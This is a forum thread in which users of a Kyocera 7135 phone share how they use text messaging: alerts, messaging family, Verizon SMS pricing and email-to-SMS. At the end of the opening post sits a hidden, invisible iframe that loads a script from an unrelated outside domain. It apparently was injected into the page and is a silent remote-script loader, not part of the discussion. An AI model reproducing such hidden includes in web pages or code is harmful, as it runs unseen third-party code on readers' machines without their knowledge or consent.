+ Reply to Thread
Page 1 of 2 1 2 LastLast

Is text messaging worth the trouble?

Could some of you give me examples of how you utilize text messaging in your daily routine. Are you using it to save your voice minutes. Could I be say using it when I'm in the car and my assistant needs a question answered, could she type a message on her computer and email it (text message it) to me. Could I then respond by highlighting a preset response back to her?

Now that I see how easy it is to read the #646 text messaged response on my screen from verizon telling me how many min I have used I'm thinking I could save time and not get into drawn out phone conversations with callers.
    I avoided this due to the fact that my past StarTac, TimePort and 6035 phones were to hard to read on their tiny 3 line screens (the 6035 was a little better, but still hard to read) but the 7135 palm screen is great. I also avoided text messaging because it went against my min when I was with verizon. My daughter just asked me if my new phone alerts me when I get an email message but in the past I avoided email because I thought it would just pass along the spam too.
    But text messaging, no one would know my address unless I gave it to them.
    Could I also send messages from the phone to my sales assist. computer.
    I already pay $45 mo for road runner and I was trying to avoid the Verizons high speed network as it will push up my monthly costs for something I might not use that much. But now I realize that adding on text messaging will only cost me about 75 cents a week.

So how do some of you make best use of text messaging?
    If I also get into email with this phone what's the cheapest way to go. Do I start with the 7135's CD and load the email program on there.
    Your thoughts please
    and Thx<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I use text messaging alot because my wife works in a call center for a major credit company and her job consists of making phone calls all day long. With my old phone i would call her, go through the phone system to type in her extension etc, just to be asked to hold because she was on the phone with a customer. Now i just TXT message her and tell her to call me when she is done with her next call. That way i don't waste minutes. I also use it when i am sitting in some of my college classes. I just flip the screep up so that it is 90 degrees with the rest of the phone and me and the wife communicat that way. I can Grafitti without looking so i don't even look like i'm chatting... My wife thinks it's the coolest think ever.

Plus i changed my SMS alert to the Terry Tate "You've got mail" file so it makes it that much cooler. My friends are all green with envy.

***NOTE*** Do not install below file without reading http://www.smartphonesource.com/vbul...ghlight=kwcsms
    Attached Files
    You should be 10% smarter than the equipment you operate. For some of you, the 7135 is not the best choice of equipment.

I receive a lot more messages then I send. I have CNN breaking news sent to my text message email address, severe weather alerts for my area, traffic alerts for the roads I tend to drive, and daily closing stock price for the one stock I own.

Alan

Originally posted by alanb
    I receive a lot more messages then I send. I have CNN breaking news sent to my text message email address, severe weather alerts for my area, traffic alerts for the roads I tend to drive, and daily closing stock price for the one stock I own.

Alan
    Thanks Alan, are you going to different sites and having them "push" the alerts to you or is there one site like Avantgo that will give all these alerts to your 7135 by checking off what content you want?

[QUOTE]Originally posted by Byrd Dog
    [B]I use text messaging alot because my wife works in a call center for a major credit company and her job consists of making phone calls all day long. With my old phone i would call her, go through the phone system to type in her extension etc, just to be asked to hold because she was on the phone with a customer. Now i just TXT message her and tell her to call me when she is done with her next call.

So Dog, when you text message her is it going through her regular email system or is she reading it off her phone that is text message enabled.

Great ideas on the SMS alerts.

I use text messaging primarily at work (IT business). When there are server and/or business problems, I am paged automatically with specifics. Often I am paged with ad hoc informational stuff and by my assistant when I'm being summoned by busy muckity mucks. They either want a specific answer via text messaging or they want me to call them.

In turn, I send messages to folks all day long to ensure the issues are being addressed so I am ready to respond to the muckity mucks. "Please tell me when the last of the patches were applied to the servers in Minnesota and Wisconsin." When I'm in a meeting and think of something I need my assistant to do, I'll use text messaging to her email address with instructions. She replies and we get everything settled without me even having to leave the meeting. I guess those folks think I'm a muckity muck .

Some people prefer carrying around a notebook computer sending and receiving mail all day long but I find text messaging devices faster and more convenient. If I can figure out how to get my corporate instant messaging to work on this thing, I'll be very, very happy.

For my OWN use, I message friends on anything from dinner plans to what is on TV. The nice thing about messaging is it is less committal. You don't have to go through all of the salutations and conversation ends. No one has to dedicate a lot of time but if more in depth discussion is warranted one party can just call the other.

[QUOTE]Originally posted by Expidia
    [B]
    Originally posted by Byrd Dog
    I use text messaging alot because my wife works in a call center for a major credit company and her job consists of making phone calls all day long. With my old phone i would call her, go through the phone system to type in her extension etc, just to be asked to hold because she was on the phone with a customer. Now i just TXT message her and tell her to call me when she is done with her next call.

So Dog, when you text message her is it going through her regular email system or is she reading it off her phone that is text message enabled.

Great ideas on the SMS alerts.
    She reads it straight on her outlook account from work. I just send them to her normal email account.
    You should be 10% smarter than the equipment you operate. For some of you, the 7135 is not the best choice of equipment.

bill reminder

american express will warn you that your bill is coming due. you specify how many days' warning you'd like. then pay your bill online. it's so painless it's frightening. never lose membership rewards again.

Originally posted by Byrd Dog
    My wife thinks it's the coolest thing ever.
    lol... how many guys around here can say that :p

That Terry Tate clip has to crack people up when it goes off for an SMS
    Please visit my picture site: Robert-O-Rama :)

Re: bill reminder

Originally posted by mama's_wired
    american express will warn you that your bill is coming due. you specify how many days' warning you'd like. then pay your bill online. it's so painless it's frightening. never lose membership rewards again.
    I'm too afraid of SPAM to give out my text message email address to companies. I guess Amex is pretty safe though.

Originally posted by Expidia
    Thanks Alan, are you going to different sites and having them "push" the alerts to you or is there one site like Avantgo that will give all these alerts to your 7135 by checking off what content you want?
    There are a pretty decent set of alerts on www.vtext.com
    and www.vzw.msn.com

I prefer the vtext offerings though.

Originally posted by Robert K.
    lol... how many guys around here can say that :p

That Terry Tate clip has to crack people up when it goes off for an SMS
    It does, i was in a study group for finals this morning when my wife sent me a text message and everyone was AMAZED when terry kicked in... It took us 20 mins to get back on topic cuzz everyone was checkin out the phone.

Different sites.

I get the stock quote from vtext.com, CNN breaking news directly from cnn.com, severe weather alerts from weather.com (the weather channel) and traffic alerts from some Microsoft site that I have forgotten how I found. Might have been a link from expedia.

Alan

Thanks to all those who replied so far. Still interested in hearing more posts as this seems to be a really useful feature used in ways I never would have thought of. I think Verizon offers a free month for text messaging and 2.99 a mo for 100 messages. How do I use the messaging feature if I want to send a message to my wifes computer to her email address?
    Do I first have to download the email program that is on the Kyo CD to get going after I sign up?

Thanks to all those who replied so far. Still interested in hearing more posts as this seems to be a really useful feature used in ways I never would have thought of. I think Verizon offers a free month for text messaging and 2.99 a mo for 100 messages. How do I use the messaging feature if I want to send a message to my wifes computer to her email address?
    Do I first have to download the email program that is on the Kyo CD to get going after I sign up?
    VZW was offering unlimited SMS for 2.99/month through June 30 which then reverts to 100 messages/month for that price after June 30. I believe yesterday was the last day to get in on the promotion (and the CS rep hinted that he thought there would be a new plan or promotion starting July 1 to replace it).

You can send SMS to email directly from the SMS messages application but of course, once the unlimited promotion expires, they will come out of your plan or cost .10 each if you aren't on an SMS plan.

You can also do email from your phone (including email to SMS), either with Eudora email, which is in ROM on the phone, or Mobile Mail from the CD, or several other Palm email programs. This is slower since you need to establish a connection to send it, and the time to send it and disconnect comes out of your minutes unless you are on the unlimited Express network plan.

Alan

You can also do email from your phone (including email to SMS), either with Eudora email, which is in ROM on the phone, or Mobile Mail from the CD, or several other Palm email programs. This is slower since you need to establish a connection to send it, and the time to send it and disconnect comes out of your minutes unless you are on the unlimited Express network plan.

Thx Alan, so from what you are saying I can use the Eurdora mail to send text messages to my wifes computer which is the best way is this correct?
    What does SMS mean?

Originally posted by alanb
    VZW was offering unlimited SMS for 2.99/month through June 30 which then reverts to 100 messages/month for that price after June 30. I believe yesterday was the last day to get in on the promotion (and the CS rep hinted that he thought there would be a new plan or promotion starting July 1 to replace it).
    I sure hope so! I hooked on unlimited SMS and would prefer not to pay $10+ after 6/30 to get enough SMS's to hold me.

Thx Alan, so from what you are saying I can use the Eurdora mail to send text messages to my wifes computer which is the best way is this correct?
    What does SMS mean?
    If you have unlimited Express network, then sending from email is the best way becuase it won't cost you anything. If you have a huge number of voice minutes and you never go over, then email is probably also the most cost effective way (again, unless you are on the promotional unlimited text messaging plan, in which case it is faster and easier to send via SMS).

I believe SMS stands for "Short Message Service"

Alan

One thing I'm currently using SMS for is for forwarding of copies of "important" e-mail from Outlook to my 7135. I have "rules" setup so that each time I receive an e-mail with certain words in the header or body, or from certain people, Outlook automatically forwards a copy to my vtext address.

One of my favorite trivial uses of my unlimited SMS is to have the "ESPN Insider" wireless service send me SMS for all of the NBA playoff games at the end of each quarter. And during the NFL draft I had the Redskins picks sent to me.

And of course any VeriChat lover knows that SMS is a must!

I don't use SMS much... but here's nice use:
    I don't have a national plan, and was on vacation once. SMS was an excellent way to tell the folks back home about my trip without incurring roaming charges.